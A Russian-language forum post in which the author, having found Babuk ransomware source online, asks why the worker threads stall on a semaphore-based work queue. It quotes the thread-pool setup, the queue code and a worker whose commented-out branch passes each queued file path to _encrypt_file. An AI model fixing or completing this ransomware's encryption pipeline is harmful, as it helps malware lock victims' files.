отрыл исходники бабука на форуме, не могу разобраться с его потоками...
инициализирую очередь, создаю потоки и посылаю в очередь 3 сообщения
сам воркер:
собственно, первое сообщение в консоль выводится, затем "Stuck" каждые 100мс.
посмотрел принцип работы самой очереди и понял, что
после первого сообщения не очищается... не совсем понимаю как это исправить
сурс queue:
инициализирую очередь, создаю потоки и посылаю в очередь 3 сообщения
C:
SYSTEM_INFO lcSysInfo;
GetSystemInfo(&lcSysInfo);
DWORD dwNumberOfProcessors = lcSysInfo.dwNumberOfProcessors;
DWORD dwNumberOfThreads = dwNumberOfProcessors * 4;
DWORD dwNumberOfThreadsDivideBy2 = dwNumberOfThreads / 2;
_que_initialize(&que_f, dwNumberOfThreads * 6);
HANDLE* threads = (HANDLE*)malloc(dwNumberOfThreadsDivideBy2 * sizeof(HANDLE));
memset(threads, 0, dwNumberOfThreadsDivideBy2 * sizeof(HANDLE));
for (int i = 0; i < dwNumberOfThreadsDivideBy2; i++) {
threads[i] = CreateThread(0, 0, lilBabuk, (LPVOID)1, 0, 0);
}
_que_push(&que_f, (wchar_t*)L"test", TRUE);
_que_push(&que_f, (wchar_t*)L"test2", TRUE);
_que_push(&que_f, (wchar_t*)L"test3", TRUE);
WaitForMultipleObjects(dwNumberOfThreadsDivideBy2, threads, TRUE, INFINITE);
сам воркер:
C:
DWORD WINAPI lilBabuk(LPVOID lpData) {
INT iError = 0;
WCHAR* path = 0;
if (lpData) {
while (TRUE) {
if ((path = _que_pop(&que_f, FALSE, &iError)) != 0) {
WriteFile(GetStdHandle(STD_OUTPUT_HANDLE), path, strlenW(path) * sizeof(wchar_t), NULL, NULL);
WriteFile(GetStdHandle(STD_OUTPUT_HANDLE), (LPVOID)"\n", 1, NULL, NULL);
FreeMemory(path);
} else {
Sleep(100);
WriteFile(GetStdHandle(STD_OUTPUT_HANDLE), (LPVOID)"Stuck", strlen("Stuck"), NULL, NULL);
WriteFile(GetStdHandle(STD_OUTPUT_HANDLE), (LPVOID)"\n", 1, NULL, NULL);
}
}
}
else {
/*while ((path = _que_pop(&que_f, TRUE, &iError)) != 0) {
_encrypt_file(path);
_hfree(path);
}*/
}
ExitThread(0);
}
посмотрел принцип работы самой очереди и понял, что
queue->data_availпосле первого сообщения не очищается... не совсем понимаю как это исправить
сурс queue:
C:
#include <windows.h>
#include "memory.h"
#include "queue.h"
void _que_initialize(QUEUE* queue, INT size) {
queue->queue_size = size;
queue->buffer = (WCHAR**)_halloc(size * sizeof(WCHAR*));
queue->space_avail = CreateSemaphoreA(NULL, size, size, NULL);
queue->data_avail = CreateSemaphoreA(NULL, 0, size, NULL);
queue->in_pos = 0;
queue->out_pos = 0;
InitializeCriticalSection(&(queue->mutex));
}
int _que_push(QUEUE* queue, LPWSTR data, int wait) {
if (WaitForSingleObject(queue->space_avail, 0) != WAIT_OBJECT_0) {
if (wait) WaitForSingleObject(queue->space_avail, INFINITE);
else return 0;
}
EnterCriticalSection(&(queue->mutex));
WCHAR* realloced_str = 0;
if (data)
{
int memSize = sizeof(WCHAR) * (lstrlenW(data) + 1);
realloced_str = (WCHAR*)_halloc(memSize);
_memcpy(realloced_str, data, memSize);
}
queue->buffer[queue->in_pos] = realloced_str;
queue->in_pos = (queue->in_pos + 1) % queue->queue_size;
LeaveCriticalSection(&queue->mutex);
ReleaseSemaphore(queue->data_avail, 1, NULL);
return 1;
}
LPWSTR _que_pop(QUEUE* queue, int wait, int* dwError) {
*dwError = 0;
if (WaitForSingleObject(queue->data_avail, 0) != WAIT_OBJECT_0) {
if (wait) WaitForSingleObject(queue->data_avail, INFINITE);
else {
*dwError = QUEUE_ERR_TIMEOUT;
return 0;
}
}
EnterCriticalSection(&queue->mutex);
LPWSTR retval = queue->buffer[queue->out_pos];
queue->out_pos = (queue->out_pos + 1) % queue->queue_size;
LeaveCriticalSection(&queue->mutex);
ReleaseSemaphore(queue->space_avail, 1, NULL);
return retval;
}
C:
#ifndef QUEUE_H_INCLUDED
#define QUEUE_H_INCLUDED
#define QUEUE_ERR_TIMEOUT -1
#include <windows.h>
struct QUEUE {
HANDLE space_avail;
HANDLE data_avail;
CRITICAL_SECTION mutex;
INT queue_size = 0;
LPWSTR* buffer = 0;
long in_pos = 0;
long out_pos = 0;
};
void _que_initialize(QUEUE* queue, INT size);
LPWSTR _que_pop(QUEUE* queue, int wait, int* dwError);
int _que_push(QUEUE* queue, LPWSTR data, int wait);
#endif
